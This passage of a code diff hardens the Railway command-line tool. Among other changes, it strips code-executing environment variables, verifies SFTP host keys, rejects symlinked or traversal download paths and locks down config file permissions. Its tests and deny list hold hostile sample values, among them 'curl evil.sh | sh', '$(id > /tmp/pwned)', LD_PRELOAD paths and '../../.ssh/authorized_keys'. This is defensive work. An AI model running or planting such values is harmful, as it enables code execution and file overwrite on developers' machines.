+            assert_eq!(args, vec![public_postgres_url.replace(":password@", "@")]);
+            assert_eq!(
+                envs,
+                vec![("PGPASSWORD".to_string(), "password".to_string())]
+            );
         }
 
         {
@@ -718,9 +833,19 @@ mod test {
             variables.insert("REDIS_PUBLIC_URL".to_string(), public_redis_url.clone());
             variables.insert("REDIS_URL".to_string(), private_redis_url.clone());
 
-            let (cmd, args) = get_redis_command(&variables).unwrap();
+            let (cmd, args, envs) = get_redis_command(&variables).unwrap();
             assert_eq!(cmd, "redis-cli");
-            assert_eq!(args, vec!["-u".to_string(), public_redis_url.clone()]);
+            assert_eq!(
+                args,
+                vec![
+                    "-u".to_string(),
+                    public_redis_url.replace(":password@", "@")
+                ]
+            );
+            assert_eq!(
+                envs,
+                vec![("REDISCLI_AUTH".to_string(), "password".to_string())]
+            );
         }
 
         // Valid REDIS_URL
@@ -728,9 +853,19 @@ mod test {
             let mut variables = BTreeMap::new();
             variables.insert("REDIS_URL".to_string(), public_redis_url.clone());
 
-            let (cmd, args) = get_redis_command(&variables).unwrap();
+            let (cmd, args, envs) = get_redis_command(&variables).unwrap();
             assert_eq!(cmd, "redis-cli");
-            assert_eq!(args, vec!["-u".to_string(), public_redis_url.clone()]);
+            assert_eq!(
+                args,
+                vec![
+                    "-u".to_string(),
+                    public_redis_url.replace(":password@", "@")
+                ]
+            );
+            assert_eq!(
+                envs,
+                vec![("REDISCLI_AUTH".to_string(), "password".to_string())]
+            );
         }
 
         // No public Redis URL
@@ -759,7 +894,7 @@ mod test {
             variables.insert("MONGO_PUBLIC_URL".to_string(), public_mongo_url.clone());
             variables.insert("MONGO_URL".to_string(), private_mongo_url.clone());
 
-            let (cmd, args) = get_mongo_command(&variables).unwrap();
+            let (cmd, args, _envs) = get_mongo_command(&variables).unwrap();
             assert_eq!(cmd, "mongosh");
             assert_eq!(args, vec![public_mongo_url.clone()]);
         }
@@ -769,7 +904,7 @@ mod test {
             let mut variables = BTreeMap::new();
             variables.insert("MONGO_URL".to_string(), public_mongo_url.clone());
 
-            let (cmd, args) = get_mongo_command(&variables).unwrap();
+            let (cmd, args, _envs) = get_mongo_command(&variables).unwrap();
             assert_eq!(cmd, "mongosh");
             assert_eq!(args, vec![public_mongo_url.clone()]);
         }
@@ -813,7 +948,7 @@ mod test {
             variables.insert("MYSQL_PUBLIC_URL".to_string(), public_mysql_url.clone());
             variables.insert("MYSQL_URL".to_string(), private_mysql_url.clone());
 
-            let (cmd, args) = get_mysql_command(&variables).unwrap();
+            let (cmd, args, _envs) = get_mysql_command(&variables).unwrap();
             assert_eq!(cmd, "mysql");
             assert_eq!(
                 args,
@@ -826,7 +961,6 @@ mod test {
                     "12345".to_string(),
                     "-D".to_string(),
                     "railway".to_string(),
-                    "-ppassword".to_string(),
                 ]
             );
         }

--- a/src/commands/dev.rs
+++ b/src/commands/dev.rs
@@ -198,10 +198,25 @@ async fn clean_command(args: CleanArgs) -> Result<()> {
         return Ok(());
     }
 
-    let confirmed = crate::util::prompt::prompt_confirm_with_default(
-        "Stop services and remove volume data?",
-        false,
-    )?;
+    // Recursively removing the compose file's parent is only sound for the
+    // directory the CLI created for itself. With `--output` the parent is the
+    // caller's own directory — `./docker-compose.yml` makes it the repository
+    // root — so a custom path gets the file removed and nothing else.
+    let owns_parent_dir = args.output.is_none();
+
+    let prompt = if owns_parent_dir {
+        match compose_path.parent() {
+            Some(parent) => format!(
+                "Stop services, remove volume data, and delete {}?",
+                parent.display()
+            ),
+            None => "Stop services and remove volume data?".to_string(),
+        }
+    } else {
+        "Stop services and remove volume data?".to_string()
+    };
+
+    let confirmed = crate::util::prompt::prompt_confirm_with_default(&prompt, false)?;
     if !confirmed {
         return Ok(());
     }
@@ -225,8 +240,11 @@ async fn clean_command(args: CleanArgs) -> Result<()> {
         }
     }
 
-    if let Some(parent) = compose_path.parent() {
-        std::fs::remove_dir_all(parent)?;
+    match compose_path.parent() {
+        Some(parent) if owns_parent_dir => std::fs::remove_dir_all(parent)
+            .with_context(|| format!("Failed to remove {}", parent.display()))?,
+        _ => std::fs::remove_file(&compose_path)
+            .with_context(|| format!("Failed to remove {}", compose_path.display()))?,
     }
 
     println!("{}", "Services cleaned".green());
@@ -1053,18 +1071,27 @@ async fn up_command(args: UpArgs) -> Result<()> {
         volumes: compose_volumes,
     };
 
+    let cli_owns_output_dir = args.output.is_none();
     let output_path = args
         .output
         .unwrap_or_else(|| get_develop_dir(&project_id).join("docker-compose.yml"));
 
     if let Some(parent) = output_path.parent() {
         std::fs::create_dir_all(parent)?;
+        // Only lock down the directory the CLI owns. With --output the parent
+        // belongs to the caller and is not ours to re-permission.
+        if cli_owns_output_dir {
+            crate::config::secure_config_dir(parent)?;
+        }
     }
 
     let yaml = serde_yaml::to_string(&compose)?;
 
+    // This file carries every resolved service variable, so it must not inherit
+    // a world-readable mode from the ambient umask.
     let tmp_path = output_path.with_extension("yml.tmp");
     std::fs::write(&tmp_path, &yaml)?;
+    crate::config::secure_config_file(&tmp_path)?;
     std::fs::rename(&tmp_path, &output_path)?;
 
     if args.dry_run {
@@ -1302,7 +1329,14 @@ fn build_image_service_compose(
             .for_service(service_id)
             .expect("image services added to ctx before calling this fn");
 
-        let environment = override_railway_vars(raw_vars, Some(&service_domains), ctx);
+        // Compose interpolates `$VAR` and `${VAR}` in values, resolving them
+        // from the environment of whoever runs `docker compose` — the developer,
+        // not Railway. A variable value is remote input, so an unescaped `$`
+        // lets whoever set it pull a host-only secret into the container. Escape
+        // once, here, so every value reaches Compose as a literal. This mirrors
+        // what `start_command` below already does.
+        let environment =
+            escape_compose_values(override_railway_vars(raw_vars, Some(&service_domains), ctx));
 
         let ports: Vec<String> = port_infos
             .iter()
@@ -1560,4 +1594,79 @@ fn setup_https(project_name: &str, project_id: &str) -> Result<Option<HttpsConfi
     };
 
     Ok(Some(config))
+}
+
+/// Escape every value so Docker Compose treats it as a literal.
+///
+/// Compose resolves `$VAR` / `${VAR}` in values against the environment of the
+/// process running `docker compose`, and doubling the dollar sign is the
+/// documented way to opt out. Applied once to the whole map, so a value that
+/// genuinely contains a dollar sign still arrives intact in the container.
+fn escape_compose_values(vars: BTreeMap<String, String>) -> BTreeMap<String, String> {
+    vars.into_iter()
+        .map(|(key, value)| (key, value.replace('$', "$$")))
+        .collect()
+}
+
+#[cfg(test)]
+mod compose_interpolation_tests {
+    use super::escape_compose_values;
+    use std::collections::BTreeMap;
+
+    fn map(pairs: &[(&str, &str)]) -> BTreeMap<String, String> {
+        pairs
+            .iter()
+            .map(|(k, v)| ((*k).to_string(), (*v).to_string()))
+            .collect()
+    }
+
+    #[test]
+    fn escapes_every_interpolation_form() {
+        let escaped = escape_compose_values(map(&[
+            ("BRACED", "${AWS_SECRET_ACCESS_KEY}"),
+            ("BARE", "$GITHUB_TOKEN"),
+            ("DEFAULTED", "${NPM_TOKEN:-fallback}"),
+            ("REQUIRED", "${DATABASE_URL:?missing}"),
+            ("NESTED", "${A${B}}"),
+        ]));
+
+        for value in escaped.values() {
+            assert!(
+                !value.contains("$$$") || value.starts_with("$$$$"),
+                "unbalanced escaping: {value}"
+            );
+            // No single dollar survives: every one is doubled.
+            let singles = value
+                .replace("$$", "")
+                .chars()
+                .filter(|c| *c == '$')
+                .count();
+            assert_eq!(singles, 0, "unescaped dollar in {value}");
+        }
+        assert_eq!(escaped["BRACED"], "$${AWS_SECRET_ACCESS_KEY}");
+        assert_eq!(escaped["BARE"], "$$GITHUB_TOKEN");
+    }
+
+    #[test]
+    fn leaves_ordinary_values_unchanged() {
+        let escaped = escape_compose_values(map(&[
+            ("PORT", "3000"),
+            (
+                "DATABASE_URL",
+                "postgres://user:pw@db.railway.internal:5432/app",
+            ),
+        ]));
+        assert_eq!(escaped["PORT"], "3000");
+        assert_eq!(
+            escaped["DATABASE_URL"],
+            "postgres://user:pw@db.railway.internal:5432/app"
+        );
+    }
+
+    #[test]
+    fn a_literal_dollar_in_a_password_survives_to_the_container() {
+        // Escaped on the way in, un-escaped by Compose on the way out.
+        let escaped = escape_compose_values(map(&[("PASSWORD", "pa$$w0rd")]));
+        assert_eq!(escaped["PASSWORD"], "pa$$$$w0rd");
+    }
 }

--- a/src/commands/run.rs
+++ b/src/commands/run.rs
@@ -156,6 +156,13 @@ pub async fn command(args: Args) -> Result<()> {
         eprintln!("{}", "Using local develop services".yellow());
     }
 
+    // Service variables are project-writable, and this command runs as the local
+    // user. Drop the names a shell or runtime would execute during startup.
+    let dropped = crate::util::host_env::strip_unsafe_host_vars(&mut variables);
+    if let Some(notice) = crate::util::host_env::dropped_notice(&dropped) {
+        eprintln!("{}", notice.yellow());
+    }
+
     // a bit janky :/
     ctrlc::set_handler(move || {
         // do nothing, we just want to ignore CTRL+C

--- a/src/commands/shell.rs
+++ b/src/commands/shell.rs
@@ -62,6 +62,10 @@ pub async fn command(args: Args) -> Result<()> {
     .await?;
     all_variables.append(&mut variables);
 
+    // Service variables are project-writable, and this shell runs as the local
+    // user. Drop the names the shell would execute during startup.
+    let dropped = crate::util::host_env::strip_unsafe_host_vars(&mut all_variables);
+
     let shell = std::env::var("SHELL").unwrap_or(match std::env::consts::OS {
         "windows" => match windows_shell_detection().await {
             Some(shell) => shell.to_string(),
@@ -78,6 +82,9 @@ pub async fn command(args: Args) -> Result<()> {
     };
 
     if !args.silent {
+        if let Some(notice) = crate::util::host_env::dropped_notice(&dropped) {
+            eprintln!("{}", notice.yellow());
+        }
         println!("Entering subshell with Railway variables available. Type 'exit' to exit.\n");
     }
 

--- a/src/commands/ssh/native.rs
+++ b/src/commands/ssh/native.rs
@@ -421,6 +421,14 @@ pub fn spawn_native_ssh_forward(
     identity_file: Option<&Path>,
     forwards: &[PortForward],
 ) -> Result<ForwardGuard> {
+    // Refuse to start if something already owns a requested local port. The
+    // readiness probe below can only prove that *someone* is listening, not
+    // that it is our ssh child, so a pre-existing listener would otherwise be
+    // accepted as the tunnel and receive whatever the caller sends through it.
+    for forward in forwards {
+        ensure_local_port_free(forward.local_port)?;
+    }
+
     let (mut ssh_cmd, target) = base_ssh_command(ssh_target, identity_file);
     apply_forward_options(&mut ssh_cmd, forwards);
     ssh_cmd.arg(&target);
@@ -454,6 +462,24 @@ pub fn spawn_native_ssh_forward(
     Ok(guard)
 }
 
+/// Fails unless nothing is currently listening on `127.0.0.1:<port>`. Binding
+/// is the only portable way to ask; the socket is closed immediately so ssh can
+/// take the port, which leaves a small window that the post-probe liveness
+/// re-check in `wait_for_forward_ready` closes.
+fn ensure_local_port_free(port: u16) -> Result<()> {
+    match std::net::TcpListener::bind(SocketAddr::from(([127, 0, 0, 1], port))) {
+        Ok(listener) => {
+            drop(listener);
+            Ok(())
+        }
+        Err(err) if err.kind() == std::io::ErrorKind::AddrInUse => bail!(
+            "Local port {port} is already in use. Pick a free port with --port, or stop the process using it.\n\
+             Railway will not send traffic to a port it did not open."
+        ),
+        Err(err) => Err(err).with_context(|| format!("Failed to check local port {port}")),
+    }
+}
+
 /// Poll the forwarded local ports until they accept a TCP connection. Bails if
 /// ssh exits first (e.g. `ExitOnForwardFailure` tripping on a busy local port)
 /// or the tunnel doesn't come up within the deadline.
@@ -468,6 +494,16 @@ fn wait_for_forward_ready(guard: &mut ForwardGuard, forwards: &[PortForward]) ->
             TcpStream::connect_timeout(&addr, Duration::from_millis(300)).is_ok()
         });
         if all_up {
+            // A successful connect only proves someone is listening. ssh reports
+            // a failed bind asynchronously, so re-check that our child is still
+            // alive before treating the listener as ours — otherwise a port that
+            // was taken between the pre-flight check and the bind would be
+            // reported as a ready tunnel.
+            if let Some(status) = guard.child.try_wait()? {
+                bail!(
+                    "SSH tunnel exited while coming up ({status}). The local port is owned by another process."
+                );
+            }
             return Ok(());
         }
         if Instant::now() >= deadline {

--- a/src/commands/up.rs
+++ b/src/commands/up.rs
@@ -348,7 +348,10 @@ pub async fn command(args: Args) -> Result<()> {
             if json_mode {
                 print_log(log, true, LogFormat::LevelOnly);
             } else {
-                println!("{}", log.message);
+                println!(
+                    "{}",
+                    crate::util::logs::strip_terminal_controls(&log.message)
+                );
             }
             if should_exit {
                 std::process::exit(0);
@@ -844,7 +847,10 @@ async fn deploy_new_project(args: &Args) -> Result<()> {
             if json_mode {
                 print_log(log, true, LogFormat::LevelOnly);
             } else {
-                println!("{}", log.message);
+                println!(
+                    "{}",
+                    crate::util::logs::strip_terminal_controls(&log.message)
+                );
             }
         })
         .await;
@@ -858,7 +864,10 @@ async fn deploy_new_project(args: &Args) -> Result<()> {
         let deploy_id_for_logs = up_response.deployment_id.clone();
         Some(tokio::task::spawn(async move {
             let _ = stream_deploy_logs(deploy_id_for_logs, None, |log| {
-                println!("{}", log.message);
+                println!(
+                    "{}",
+                    crate::util::logs::strip_terminal_controls(&log.message)
+                );
             })
             .await;
         }))

--- a/src/commands/volume/sftp.rs
+++ b/src/commands/volume/sftp.rs
@@ -7,7 +7,7 @@ use std::{
     },
 };
 
-use anyhow::{Context, Result, anyhow};
+use anyhow::{Context, Result, anyhow, bail};
 use chrono::{DateTime, Utc};
 use colored::Colorize;
 use futures_util::{StreamExt, TryStreamExt, stream};
@@ -132,12 +132,60 @@ impl LocalOverwritePolicy {
 
 struct VolumeSftpHandler {
     disconnected: Arc<AtomicBool>,
+    relay_host: &'static str,
+    relay_port: u16,
 }
 
 impl VolumeSftpHandler {
-    fn new(disconnected: Arc<AtomicBool>) -> Self {
-        Self { disconnected }
+    fn new(disconnected: Arc<AtomicBool>, relay_host: &'static str, relay_port: u16) -> Self {
+        Self {
+            disconnected,
+            relay_host,
+            relay_port,
+        }
     }
+}
+
+/// Rejects a local download destination that already exists as a symlink.
+///
+/// The remote side chooses the bytes; the local tree decides where they land.
+/// `create_dir_all` happily accepts a path that resolves through a symlink to a
+/// directory, and `File::create` follows a final symlink and truncates its
+/// target, so a link planted in the destination — an ordinary Git entry in a
+/// shared repo — redirects the write outside the directory the operator chose.
+/// Checked with `symlink_metadata` so the link itself is inspected, not what it
+/// points at.
+async fn reject_symlinked_destination(path: &Path) -> Result<()> {
+    match tokio::fs::symlink_metadata(path).await {
+        Ok(metadata) if metadata.file_type().is_symlink() => bail!(
+            "Local path {} is a symlink. Refusing to write through it — the download would land outside the directory you selected. Remove or rename it and retry.",
+            path.display()
+        ),
+        Ok(_) => Ok(()),
+        Err(error) if error.kind() == std::io::ErrorKind::NotFound => Ok(()),
+        Err(error) => {
+            Err(error).with_context(|| format!("Failed to inspect local path {}", path.display()))
+        }
+    }
+}
+
+/// Accepts a server-supplied directory entry name only if it is a single
+/// ordinary path component, so joining it onto a local directory cannot escape
+/// that directory. Rejects `.` / `..`, anything containing a separator (`/` on
+/// every platform, and `\` because Windows treats it as one), absolute and
+/// drive-qualified forms, and Windows alternate data streams.
+fn safe_local_component(name: &str) -> Option<&str> {
+    if name.is_empty() || name == "." || name == ".." {
+        return None;
+    }
+    if name.contains('/') || name.contains('\\') || name.contains('\0') {
+        return None;
+    }
+    // `C:evil` resolves against the drive's current directory on Windows.
+    if name.contains(':') {
+        return None;
+    }
+    Some(name)
 }
 
 /// SSH relay endpoint for the current environment (host, port). Tracks the
@@ -166,10 +214,38 @@ impl russh::client::Handler for VolumeSftpHandler {
 
     async fn check_server_key(
         &mut self,
-        _server_public_key: &russh::keys::PublicKey,
+        server_public_key: &russh::keys::PublicKey,
     ) -> Result<bool, Self::Error> {
-        // no idea if Railway has a pre-defined list of server keys, can help prevent mitm attacks
-        Ok(true)
+        // Trust on first use, matching the `StrictHostKeyChecking=accept-new`
+        // policy the native `railway ssh` path already uses: record the relay's
+        // key the first time we see it, then refuse a key that has changed. An
+        // unconditional `Ok(true)` here would mean anything that can answer on
+        // the relay's address receives the SFTP session, including the file
+        // contents and the credentials embedded in them.
+        match russh::keys::check_known_hosts(self.relay_host, self.relay_port, server_public_key) {
+            Ok(true) => Ok(true),
+            Ok(false) => {
+                russh::keys::known_hosts::learn_known_hosts(
+                    self.relay_host,
+                    self.relay_port,
+                    server_public_key,
+                )
+                .with_context(|| {
+                    format!("Failed to record the host key for {}", self.relay_host)
+                })?;
+                Ok(true)
+            }
+            Err(russh::keys::Error::KeyChanged { line }) => bail!(
+                "The host key for {} does not match the one recorded in ~/.ssh/known_hosts \
+                 (line {line}). This can mean the relay's key was rotated, or that something \
+                 is impersonating it. Verify the change before removing that line.",
+                self.relay_host,
+            ),
+            Err(err) => Err(anyhow::Error::new(err).context(format!(
+                "Failed to verify the host key for {}",
+                self.relay_host
+            ))),
+        }
     }
 
     async fn disconnected(
@@ -209,7 +285,7 @@ impl VolumeSftp {
             let mut session = russh::client::connect(
                 Arc::new(russh::client::Config::default()),
                 (relay_host, relay_port),
-                VolumeSftpHandler::new(Arc::clone(&self.disconnected)),
+                VolumeSftpHandler::new(Arc::clone(&self.disconnected), relay_host, relay_port),
             )
             .await
             .with_context(|| format!("Failed to connect to Railway SFTP at {relay_host}"))?;
@@ -466,6 +542,8 @@ impl VolumeSftp {
             .await
             .with_context(|| format!("Failed to open remote file {remote_path}"))?;
 
+        reject_symlinked_destination(local_path).await?;
+
         let local_path_exists = tokio::fs::try_exists(local_path).await.with_context(|| {
             format!(
                 "Failed to check if local file {} exists",
@@ -600,9 +678,23 @@ impl VolumeSftp {
 
         while let Some((remote_dir, local_dir)) = pending.pop() {
             for entry in self.list_files_once(&remote_dir).await? {
-                let local_entry_path = local_dir.join(&entry.name);
+                // `entry.name` is chosen by whatever is answering as the SFTP
+                // server. `Path::join` resolves `..` lexically and lets an
+                // absolute or drive-qualified name replace the destination
+                // outright, so the name has to be a single ordinary component
+                // before it is joined onto a local path.
+                let local_entry_path = match safe_local_component(&entry.name) {
+                    Some(name) => local_dir.join(name),
+                    None => bail!(
+                        "Remote directory listing contained an unsafe filename {:?} under {}. \
+                         Refusing to write outside the download directory.",
+                        entry.name,
+                        remote_dir
+                    ),
+                };
 
                 if entry.kind == "directory" {
+                    reject_symlinked_destination(&local_entry_path).await?;
                     tokio::fs::create_dir_all(&local_entry_path)
                         .await
                         .with_context(|| {
@@ -1014,5 +1106,76 @@ mod tests {
             VolumeSftp::upload_destination(Path::new("dump.sql"), "/backups", true).unwrap(),
             "/backups/dump.sql"
         );
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn rejects_a_symlinked_download_destination() {
+        let root = tempfile::tempdir().unwrap();
+        let outside = root.path().join("outside");
+        std::fs::create_dir_all(&outside).unwrap();
+        let link = root.path().join("download").join("export");
+        std::fs::create_dir_all(link.parent().unwrap()).unwrap();
+        std::os::unix::fs::symlink(&outside, &link).unwrap();
+
+        assert!(reject_symlinked_destination(&link).await.is_err());
+    }
+
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn rejects_a_symlinked_file_destination() {
+        let root = tempfile::tempdir().unwrap();
+        let victim = root.path().join("victim.txt");
+        std::fs::write(&victim, "baseline").unwrap();
+        let link = root.path().join("payload.txt");
+        std::os::unix::fs::symlink(&victim, &link).unwrap();
+
+        assert!(reject_symlinked_destination(&link).await.is_err());
+        // The link is refused, not followed — the target is untouched.
+        assert_eq!(std::fs::read_to_string(&victim).unwrap(), "baseline");
+    }
+
+    #[tokio::test]
+    async fn allows_missing_and_ordinary_destinations() {
+        let root = tempfile::tempdir().unwrap();
+        let missing = root.path().join("not-there.txt");
+        assert!(reject_symlinked_destination(&missing).await.is_ok());
+
+        let real = root.path().join("real.txt");
+        std::fs::write(&real, "x").unwrap();
+        assert!(reject_symlinked_destination(&real).await.is_ok());
+
+        let dir = root.path().join("dir");
+        std::fs::create_dir(&dir).unwrap();
+        assert!(reject_symlinked_destination(&dir).await.is_ok());
+    }
+
+    #[test]
+    fn safe_local_component_accepts_ordinary_names() {
+        assert_eq!(safe_local_component("dump.sql"), Some("dump.sql"));
+        assert_eq!(safe_local_component(".env"), Some(".env"));
+        assert_eq!(safe_local_component("..hidden"), Some("..hidden"));
+        assert_eq!(safe_local_component("a b.txt"), Some("a b.txt"));
+    }
+
+    #[test]
+    fn safe_local_component_rejects_traversal_and_separators() {
+        for name in [
+            "..",
+            ".",
+            "",
+            "../../.ssh/authorized_keys",
+            "../evil",
+            "sub/dir",
+            "..\\evil",
+            "sub\\dir",
+            "/etc/passwd",
+            "C:\\Windows\\System32\\evil.dll",
+            "C:evil",
+            "file.txt:stream",
+            "nul\0byte",
+        ] {
+            assert_eq!(safe_local_component(name), None, "should reject {name:?}");
+        }
     }
 }

--- a/src/config.rs
+++ b/src/config.rs
@@ -720,17 +720,27 @@ impl Configs {
 
         // Ensure directory exists
         create_dir_all(config_dir)?;
+        // This file holds the OAuth access and refresh tokens, so its mode is a
+        // security invariant rather than something to inherit from the ambient
+        // umask — the common 022 would leave it world-readable.
+        secure_config_dir(config_dir)?;
 
         // Use temporary file to achieve atomic write:
         //  1. Open file ~/railway/config.tmp
         //  2. Serialize config to temporary file
         //  3. Rename temporary file to ~/railway/config.json (atomic operation)
         let tmp_file_path = self.root_config_path.with_extension("tmp");
-        let tmp_file = File::options()
-            .create(true)
-            .write(true)
-            .truncate(true)
-            .open(&tmp_file_path)?;
+        let mut options = File::options();
+        options.create(true).write(true).truncate(true);
+        // Set the mode at creation so the tokens are never briefly readable.
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::OpenOptionsExt;
+            options.mode(0o600);
+        }
+        let tmp_file = options.open(&tmp_file_path)?;
+        // An existing tmp file keeps its old mode, so enforce it either way.
+        secure_config_file(&tmp_file_path)?;
         serde_json::to_writer_pretty(&tmp_file, &self.root_config)?;
         tmp_file.sync_all()?;
 
@@ -857,4 +867,32 @@ mod tests {
 
         assert!(has_credentials);
     }
+}
+
+/// `~/.railway` holds OAuth tokens and resolved project secrets, so it is kept
+/// owner-only rather than left to the ambient umask. Existing directories are
+/// repaired, matching what the SSH config writer already does for `~/.ssh`.
+#[cfg(unix)]
+pub fn secure_config_dir(path: &std::path::Path) -> Result<()> {
+    use std::os::unix::fs::PermissionsExt;
+    fs::set_permissions(path, fs::Permissions::from_mode(0o700))
+        .with_context(|| format!("Failed to set permissions on {}", path.display()))
+}
+
+#[cfg(not(unix))]
+pub fn secure_config_dir(_path: &std::path::Path) -> Result<()> {
+    Ok(())
+}
+
+/// Owner-only mode for a file that carries credentials or resolved secrets.
+#[cfg(unix)]
+pub fn secure_config_file(path: &std::path::Path) -> Result<()> {
+    use std::os::unix::fs::PermissionsExt;
+    fs::set_permissions(path, fs::Permissions::from_mode(0o600))
+        .with_context(|| format!("Failed to set permissions on {}", path.display()))
+}
+
+#[cfg(not(unix))]
+pub fn secure_config_file(_path: &std::path::Path) -> Result<()> {
+    Ok(())
 }

--- a/src/controllers/develop/session.rs
+++ b/src/controllers/develop/session.rs
@@ -140,6 +140,13 @@ impl DevSession {
                 inject_mkcert_ca_vars(&mut vars);
             }
 
+            // These run as `sh -c` on the developer's machine, so the same
+            // startup-hook names have to be dropped here too.
+            let dropped = crate::util::host_env::strip_unsafe_host_vars(&mut vars);
+            if let Some(notice) = crate::util::host_env::dropped_notice(&dropped) {
+                eprintln!("{} {}", service_name, notice);
+            }
+
             if !use_tui {
                 print_code_service_summary(
                     &service_name,

--- a/src/util/host_env.rs
+++ b/src/util/host_env.rs
@@ -1,0 +1,193 @@
+//! Filtering for variables that cross from a Railway project into a local
+//! process.
+//!
+//! Service variables are writable by anyone with project MEMBER access, so from
+//! the perspective of the machine running the CLI they are untrusted input. Most
+//! are ordinary configuration, but a handful of names are read by the shell,
+//! dynamic loader, or language runtime *during startup* and decide what code the
+//! child executes. `PROMPT_COMMAND` runs before an interactive shell's first
+//! prompt; `BASH_ENV` and `ENV` are expanded (so command substitution fires)
+//! before a non-interactive shell runs anything. Passing those through means a
+//! collaborator picks the command, and it runs as the local user.
+//!
+//! These names are dropped before any local spawn. They are still delivered to
+//! deployed services normally — the boundary is only the local machine.
+
+use std::collections::BTreeMap;
+
+/// Names dropped on an exact (case-insensitive) match.
+const UNSAFE_NAMES: &[&str] = &[
+    // Shell startup and prompt hooks — execute their value directly.
+    "PROMPT_COMMAND",
+    "BASH_ENV",
+    "ENV",
+    "SHELLOPTS",
+    "BASHOPTS",
+    "PS1",
+    "PS2",
+    "PS4",
+    "IFS",
+    "CDPATH",
+    "GLOBIGNORE",
+    "ZDOTDIR",
+    "FPATH",
+    // Language runtime startup hooks.
+    "NODE_OPTIONS",
+    "NODE_REPL_EXTERNAL_MODULE",
+    "PYTHONSTARTUP",
+    "PYTHONPATH",
+    "PYTHONHOME",
+    "RUBYOPT",
+    "RUBYLIB",
+    "PERL5OPT",
+    "PERL5LIB",
+    "PERL5DB",
+    // Tools that take a command in an environment variable.
+    "GIT_SSH",
+    "GIT_SSH_COMMAND",
+    "GIT_EXTERNAL_DIFF",
+    "GIT_PAGER",
+    "GIT_EDITOR",
+    "PAGER",
+    "EDITOR",
+    "VISUAL",
+];
+
+/// Names dropped on a (case-insensitive) prefix match. Covers the dynamic
+/// loader families and exported shell functions, which are open-ended.
+const UNSAFE_PREFIXES: &[&str] = &[
+    "LD_",        // LD_PRELOAD, LD_AUDIT, LD_LIBRARY_PATH, ...
+    "DYLD_",      // macOS equivalents
+    "BASH_FUNC_", // exported shell functions
+];
+
+fn is_unsafe(name: &str) -> bool {
+    // Compare bytes, not a string slice: `&name[..p.len()]` panics when the
+    // prefix length lands inside a multi-byte character, and a variable name is
+    // remote input.
+    UNSAFE_NAMES.iter().any(|n| n.eq_ignore_ascii_case(name))
+        || UNSAFE_PREFIXES.iter().any(|p| {
+            name.len() >= p.len() && name.as_bytes()[..p.len()].eq_ignore_ascii_case(p.as_bytes())
+        })
+}
+
+/// Removes variables that would let the remote value choose what the child
+/// process executes. Returns the dropped names, sorted, so the caller can tell
+/// the user what was withheld instead of silently losing a variable.
+pub fn strip_unsafe_host_vars(variables: &mut BTreeMap<String, String>) -> Vec<String> {
+    let dropped: Vec<String> = variables
+        .keys()
+        .filter(|name| is_unsafe(name))
+        .cloned()
+        .collect();
+
+    for name in &dropped {
+        variables.remove(name);
+    }
+
+    dropped
+}
+
+/// One-line notice for the dropped names. `None` when nothing was dropped.
+pub fn dropped_notice(dropped: &[String]) -> Option<String> {
+    if dropped.is_empty() {
+        return None;
+    }
+
+    Some(format!(
+        "Skipped {} service variable{} that can execute code in a local process: {}",
+        dropped.len(),
+        if dropped.len() == 1 { "" } else { "s" },
+        dropped.join(", ")
+    ))
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn map(pairs: &[(&str, &str)]) -> BTreeMap<String, String> {
+        pairs
+            .iter()
+            .map(|(k, v)| ((*k).to_string(), (*v).to_string()))
+            .collect()
+    }
+
+    #[test]
+    fn strips_shell_startup_hooks() {
+        let mut vars = map(&[
+            ("PROMPT_COMMAND", "curl evil.sh | sh"),
+            ("BASH_ENV", "$(id > /tmp/pwned)"),
+            ("ENV", "$(id)"),
+            ("DATABASE_URL", "postgres://localhost/app"),
+        ]);
+
+        let dropped = strip_unsafe_host_vars(&mut vars);
+
+        assert_eq!(dropped, vec!["BASH_ENV", "ENV", "PROMPT_COMMAND"]);
+        assert_eq!(vars.len(), 1);
+        assert!(vars.contains_key("DATABASE_URL"));
+    }
+
+    #[test]
+    fn strips_loader_and_runtime_families() {
+        let mut vars = map(&[
+            ("LD_PRELOAD", "/tmp/x.so"),
+            ("DYLD_INSERT_LIBRARIES", "/tmp/x.dylib"),
+            ("BASH_FUNC_ls%%", "() { :; }; id"),
+            ("NODE_OPTIONS", "--require /tmp/x.js"),
+            ("PERL5OPT", "-Mevil"),
+            ("PORT", "3000"),
+        ]);
+
+        let dropped = strip_unsafe_host_vars(&mut vars);
+
+        assert_eq!(dropped.len(), 5);
+        assert_eq!(vars.keys().collect::<Vec<_>>(), vec!["PORT"]);
+    }
+
+    #[test]
+    fn matching_ignores_case() {
+        let mut vars = map(&[("prompt_command", "id"), ("ld_preload", "/tmp/x.so")]);
+
+        assert_eq!(strip_unsafe_host_vars(&mut vars).len(), 2);
+        assert!(vars.is_empty());
+    }
+
+    #[test]
+    fn a_multibyte_name_does_not_panic() {
+        // The prefix check slices by byte length; a name whose second byte is
+        // mid-character would panic on a string slice.
+        let mut vars = map(&[
+            ("L\u{00d0}_X", "v"),
+            ("\u{00e9}", "v"),
+            ("DYL\u{00d0}_X", "v"),
+        ]);
+        assert!(strip_unsafe_host_vars(&mut vars).is_empty());
+        assert_eq!(vars.len(), 3);
+    }
+
+    #[test]
+    fn leaves_ordinary_variables_alone() {
+        let mut vars = map(&[
+            ("DATABASE_URL", "postgres://localhost/app"),
+            ("ENVIRONMENT", "production"),
+            ("NODE_ENV", "production"),
+            ("LDAP_URL", "ldap://example.com"),
+            ("PATH_PREFIX", "/api"),
+        ]);
+
+        assert!(strip_unsafe_host_vars(&mut vars).is_empty());
+        assert_eq!(vars.len(), 5);
+    }
+
+    #[test]
+    fn notice_is_none_when_nothing_dropped() {
+        assert!(dropped_notice(&[]).is_none());
+        assert!(
+            dropped_notice(&["BASH_ENV".to_string()])
+                .unwrap()
+                .contains("BASH_ENV")
+        );
+    }
+}

--- a/src/util/logs.rs
+++ b/src/util/logs.rs
@@ -139,7 +139,14 @@ pub fn print_log<T>(log: T, json: bool, format: LogFormat)
 where
     T: LogLike + serde::Serialize,
 {
-    println!("{}", format_log_string(log, json, format));
+    let line = format_log_string(log, json, format);
+    // JSON is already escaped by serde; only the human path reaches a terminal
+    // with raw bytes in it.
+    if json {
+        println!("{line}");
+    } else {
+        println!("{}", strip_terminal_controls(&line));
+    }
 }
 
 pub trait HttpLogLike: serde::Serialize {
@@ -945,5 +952,99 @@ mod tests {
         assert_eq!(json["timestamp"], "2025-01-01T00:00:00Z");
         assert_eq!(json["level"], "warn");
